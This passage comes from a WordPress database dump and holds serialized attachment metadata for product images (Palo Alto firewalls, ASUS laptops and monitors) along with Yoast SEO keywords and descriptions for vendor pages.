4:\"file\";s:20:\"PA500_FT-640x123.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"PA500_FT-20x4.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:4;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3153,2544,'_wp_attached_file','2018/12/PA-220R.jpg'),(3154,2544,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:523;s:4:\"file\";s:19:\"2018/12/PA-220R.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"PA-220R-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"PA-220R-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"PA-220R-768x251.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"PA-220R-1024x335.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"PA-220R-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"PA-220R-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:19:\"PA-220R-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"PA-220R-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3159,2547,'_wp_attached_file','2018/12/PA-220.jpg'),(3160,2547,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:238;s:4:\"file\";s:18:\"2018/12/PA-220.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"PA-220-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"PA-220-300x112.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"PA-220-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"PA-220-480x238.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"PA-220-640x238.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:15:\"PA-220-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1545220774\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3157,2546,'_wp_attached_file','2018/12/PA-200.png'),(3158,2546,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:420;s:4:\"file\";s:18:\"2018/12/PA-200.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"PA-200-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"PA-200-300x131.png\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"PA-200-768x336.png\";s:5:\"width\";i:768;s:6:\"height\";i:336;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"PA-200-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"PA-200-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"PA-200-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:15:\"PA-200-20x9.png\";s:5:\"width\";i:20;s:6:\"height\";i:9;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3161,1569,'_yoast_wpseo_focuskw','Palo Alto'),(3162,1569,'_yoast_wpseo_metadesc','Palo Alto provide highly effective and innovative cybersecurity across clouds, networks, and mobile devices.'),(3163,1569,'_yoast_wpseo_linkdex','71'),(3164,1577,'_yoast_wpseo_content_score','30'),(3165,1577,'_yoast_wpseo_focuskw','Redhat'),(3166,1577,'_yoast_wpseo_metadesc','AN OS FOR EVERY OCCASION, Extend your Linux infrastructure with customized versions of Red Hat Enterprise Linux, add-on functionality, desktop options, and developer tools.'),(3167,1577,'_yoast_wpseo_linkdex','72'),(3168,2553,'_wp_attached_file','2018/12/ASUS-ZenBook-13-UX331UN.jpg'),(3169,2553,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:35:\"2018/12/ASUS-ZenBook-13-UX331UN.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"ASUS-ZenBook-13-UX331UN-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"ASUS-ZenBook-13-UX331UN-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"ASUS-ZenBook-13-UX331UN-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"ASUS-ZenBook-13-UX331UN-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"ASUS-ZenBook-13-UX331UN-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:35:\"ASUS-ZenBook-13-UX331UN-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"ASUS-ZenBook-13-UX331UN-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3170,1442,'_yoast_wpseo_content_score','30'),(3171,2555,'_wp_attached_file','2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg'),(3172,2555,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:39:\"2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ASUS-ZenBook-Flip-S-UX370UA-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"ASUS-ZenBook-Flip-S-UX370UA-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"ASUS-ZenBook-Flip-S-UX370UA-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"ASUS-ZenBook-Flip-S-UX370UA-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:39:\"ASUS-ZenBook-Flip-S-UX370UA-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"ASUS-ZenBook-Flip-S-UX370UA-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3173,2556,'_wp_attached_file','2018/12/ASUS-Transformer-Book-T101HA.jpg'),(3174,2556,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:40:\"2018/12/ASUS-Transformer-Book-T101HA.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"ASUS-Transformer-Book-T101HA-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"ASUS-Transformer-Book-T101HA-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"ASUS-Transformer-Book-T101HA-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:40:\"ASUS-Transformer-Book-T101HA-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:40:\"ASUS-Transformer-Book-T101HA-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"ASUS-Transformer-Book-T101HA-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3175,1530,'_yoast_wpseo_content_score','30'),(3176,2558,'_wp_attached_file','2018/12/VP278H.jpg'),(3177,2558,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2018/12/VP278H.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"VP278H-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"VP278H-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"VP278H-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"VP278H-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"VP278H-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"VP278H-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3192,2567,'_wp_attached_file','2018/12/ASUSPRO-E520.jpg'),(3193,2567,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2018/12/ASUSPRO-E520.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"ASUSPRO-E520-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"ASUSPRO-E520-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"ASUSPRO-E520-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"ASUSPRO-E520-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"ASUSPRO-E520-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"ASUSPRO-E520-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3180,2561,'_wp_attached_file','2018/12/PA329Q.jpg'),(3181,2561,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2018/12/PA329Q.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"PA329Q-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"PA329Q-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"PA329Q-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"PA329Q-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"PA329Q-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"PA329Q-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3182,2562,'_wp_attached_file','2018/12/VA326H.jpg'),(3183,2562,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2018/12/VA326H.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"VA326H-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"VA326H-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"VA326H-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"VA326H-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"VA326H-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"VA326H-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3184,2563,'_wp_attached_file','2018/12/VC239H.jpg'),(3185,2563,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2018/12/VC239H.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"VC239H-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"VC239H-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"VC239H-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"VC239H-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"VC239H-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"VC239H-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3186,2564,'_wp_attached_file','2018/12/VP228HE.jpg'),(3187,2564,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:19:\"2018/12/VP228HE.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"VP228HE-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"VP228HE-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:19:\"VP228HE-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:19:\"VP228HE-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:19:\"VP228HE-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"VP228HE-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3188,2565,'_wp_attached_file','2018/12/VZ249H.jpg'),(3189,2565,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:18:\"2018/12/VZ249H.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"VZ249H-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"VZ249H-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:18:\"VZ249H-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:18:\"VZ249H-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:18:\"VZ249H-500x400.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:16:\"VZ249H-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3190,2566,'_wp_attached_file','2018/12/MB169B-1.jpg'),(3191,2566,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:496;s:6:\"height\";i:319;s:4:\"file\";s:20:\"2018/12/MB169B-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"MB169B-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"MB169B-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"MB169B-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"MB169B-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s